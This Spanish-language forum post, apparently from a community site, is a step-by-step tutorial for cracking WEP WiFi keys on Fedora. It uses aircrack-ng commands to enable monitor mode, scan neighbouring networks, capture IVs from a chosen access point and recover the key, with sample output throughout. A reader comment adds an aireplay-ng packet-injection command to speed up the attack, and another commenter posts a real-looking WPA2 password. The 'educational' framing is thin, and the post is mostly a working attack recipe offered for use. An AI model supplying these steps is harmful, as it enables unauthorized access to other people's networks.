El post que buscas se encuentra eliminado, pero este también te puede interesar

Obtener contraseña WEP con Fedora

Anuncios

Obtener "Fácil" y Sencillamente Contraseñas WiFi

Hay muchas razones para querer obtener una de estas claves
Obtener contraseña WEP  con Fedora
Pero en este post trataremos de verlo como una cuestión "educativa". Utilizaremos Fedora como SO y nos ayudaremos de Aircrack para descifrar la contraseña. El post esta simplificado lo mas posible, para que prácticamente cualquier persona pueda usarlo. Por lo mismo evitare hacer referencias a aireplay u otra herramienta para inyectar paquetes y me dedicare exclusivamente a explicar como capturar IVs.

1. Obtener Aircrack; lo mas sencillo es abrir una terminal y usar yum, aircrack esta en los repositorios de fedora, así que no tendrán problemas para conseguirlo.

1.1-$su
contraseña:
1.2-#yum install aircrack-ng

2. Con el aircrack instalado, desactivamos nuestra tarjeta wifi (en kde directamente con el networkmanager desactivado la casilla <Habilitar Redes> y checamos el nombre de nuestra tarjeta. Casi siempre Fedora pone el mismo "wlan0", pero uno nunca sabe.

2.1 #ifconfig Obtendrán algo así. Donde fácilmente vemos el nombre de la tarjeta.


eth0.....Link encap:Ethernet HWaddr 00:E0:B8: FA:8A:B0
..............UP BROADCAST MULTICAST MTU:1500 Metric:1
..............RX packets:0 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:1000
..............RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
..............Interrupt:45 Base address:0x2000

lo......... Link encap:Local Loopback
..............inet addr:127.0.0.1 Mask:255.0.0.0
..............inet6 addr: ::1/128 Scope:Host
..............UP LOOPBACK RUNNING MTU:16436 Metric:1
..............RX packets:300 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:300 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:0
..............RX bytes:18920 (18.4 KiB) TX bytes:18920 (18.4 KiB)

wlan0...Link encap:Ethernet HWaddr 00:1F:3C:76: F4:6C
..............inet addr:192.168.0.13 Bcast:192.168.0.255 Mask:255.255.255.0
..............inet6 addr: fe80::21f:3cff:fe76:f46c/64 Scope:Link
..............UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
..............RX packets:51182 errors:0 dropped:0 overruns:0 frame:0
..............TX packets:42865 errors:0 dropped:0 overruns:0 carrier:0
..............collisions:0 txqueuelen:1000
..............RX bytes:40377324 (38.5 MiB) TX bytes:5865294 (5.5 MiB)


3. En la consola y como root, desactivamos la tarjeta y la ponemos en modo monitor.

3.1-#ifconfig wlan0 down
3.2-#iwconfig wlan0 mode monitor

4. Buscamos todas las redes disponibles. No profundizare en el significado de cada columna, pero es importante que la estación objetivo genere un gran numero de datos (#Data) y que el numero debajo de PWR sea lo menor posible.

4.1-#airodump-ng wlan0 Obtendrán algo así.

CH 10 ][ Elapsed: 4 s ][ 2011-01-17 22:10

BSSID__________________PWR___Beacons___#Data__#/s__CH__MB___ENC___CIPHER AUTH ESSID
00:24:56:A5:14:91_-90______6_________0______0___3___54___WEP__WEP________IFINITUM####
00:21:00:6D:B1:A9_-73_____20________100____0___11__54____WEP__WEP________cablevision##

BSSID_______________STATION____________PWR___Rate___Lost__Packets__Probes
00:21:00:6D:B1:A9__00:00:00:00:00:00_-91__0-1____25___5________cablevision##


Cerramos el programa precionando Ctrl + C


5. En el ejemplo anterior vemos la red que mas Datos genera y empezamos a capturarlos. Necesitaremos un poco de información de la pantalla anterior (Bssid y CH)

5.1 #airodump-ng -c 11 --bssid 00:21:00:6D:B1:A9 -w nombre-nuestro-archivo wlan0 -c hace referencia al canal de la PA, --bssid a la dirección MAC de la PA y -w indica el nombre para el archivo donde se capturan los paquetes

CH 11 ][ Elapsed: 0 s ][ 2011-01-17 22:52 ][ fixed channel wlan0: 5

BSSID_______________PWR___Beacons___#Data__#/s__CH__MB___ENC___CIPHER AUTH ESSID
00:21:00:6D:B1:A9_-73_____20________100____0___11__54___WEP____WEP________cablevision##

BSSID_______________STATION____________PWR___Rate___Lost__Packets__Probes
00:21:00:6D:B1:A9__00:00:00:00:00:00_-91__0-1____25___5________cablevision##


6. Dejaremos que nuestros paquetes sean capturados. Necesitaremos por lo menos 20,000 paquetes. No Exagero, este proceso sera tardado y aveces frustrante, pero es la forma mas fácil. Mientras tanto podemos dejar trabajando aircrack para que valla buscando la contraseña. Aircrack se auto-ejecutara cada 5,000 paquetes. Introduciremos la BSSID de la estación objetivo.

6.1#aircrack-ng -b 00:21:00:6D:B1:A9 nombre-nuestro-archivo-01.cap Noten que el programa automáticamente agrega un -01 al final de nuestro archivo. Este se ira incrementando amenos de que borremos los archivos con anterioridad.

__________________________Aircrack-ng 1.1


[00:00:04] Tested 50 keys (got 29377 IVs)

KB__depth__byte(vote)
0___0/ 2___00(38400) B9(36608) 3A(35072) 6D(35072) 26(34816) 2A(34816)
1___0/ 2___00(39424) C8(36352) 01(35072) 1B(35072) 7E(34560) 93(34560)
2___2/ 4___C4(35840) 00(34816) 21(34816) 5C(34048) 38(33792) 44(33792)
3___0/ 4___00(38400) 18(37888) FA(36352) 86(35584) E1(35072) ED(35072)
4___0/ 1___00(41472) 41(37376) 06(36608) CC(35840) 4C(35072) 67(34560)

KEY FOUND! [ 00:00:00:00:00 ]
Decrypted correctly: 100%


7. Finalmente levantamos nuestra red
7.1-#ifconfig wlan0 up
y re-habilitamos nuestra red en el Networkmanager y nos conectamos con la clave

contraseña

14 comentarios - Obtener contraseña WEP con Fedora

@pAuLisss13 +1
Inténtenlo! sí funciona! con suerte y tardan menos de 1 hora en conseguir los paquetes... tal vez más, pero valdrá la pena
@psvnetcat
buen post, no sabia que con fedora se podia hacer esto, solo lo habia hecho con backtrack 4
@jorgedeloya
No hay inyección de paquetes??? intenté y no me pude asociar con aireplay-ng -1 0 me dice que wlan0 esta en el canal 1 y la que busco en el canal 6, traté de cambiar con iwconfig wlan0 channel 6 pero naaaaaaaaaaaaaaa ojala y se pueda, saludos!
@delro29
tengo puesto WPA2-PSK con esta clave &quot;EYEson33dda$$$&quot;, como estoy de seguridad?
@stichblink
no es mas facil con bactrack 5 ?
@skull1478963
disculpa te di -1 sorry, la otra vez lei que la continuacion de backtrack es kali linux
@nikolasqtepasa
Hola, si hay un cliente, hay una forma muy fácil de hacer inyección de paquetes y disminuir a un par de minutos todo el proceso, en una terminal nueva hay que ejecutar (con permiso de super usuario):
aireplay-ng -3 -b (mac del router) -h (mac del cliente) (interfaz)

La mac del router es la BSSID.
La mac del cliente es la la STATION.
Y la interfaz, generalmente es wlan0.

Saludos!